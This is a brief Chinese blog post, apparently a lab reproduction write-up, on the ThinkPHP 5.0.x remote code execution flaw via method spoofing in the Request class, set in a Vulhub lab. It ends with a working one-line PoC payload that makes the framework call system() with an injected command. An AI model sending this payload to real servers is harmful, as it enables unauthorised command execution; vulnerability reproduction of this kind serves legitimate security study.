![e4b9efd1c7b8217040aa42b34163edc7.png](https://i-blog.csdnimg.cn/blog_migrate/4f97c9544f9d07717206e42181524f69.jpeg)
漏洞介绍
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,
简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用
影响版本
5.0全版本
复现环境
Vulhub漏洞靶场
vulhub-master/thinkphp/5.0.23-rce/
![28af2b20a8aa6982ba492c5b44d2e3bc.png](https://i-blog.csdnimg.cn/blog_migrate/37009792b9fa181e7c83531f1759c03f.jpeg)
漏洞poc
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls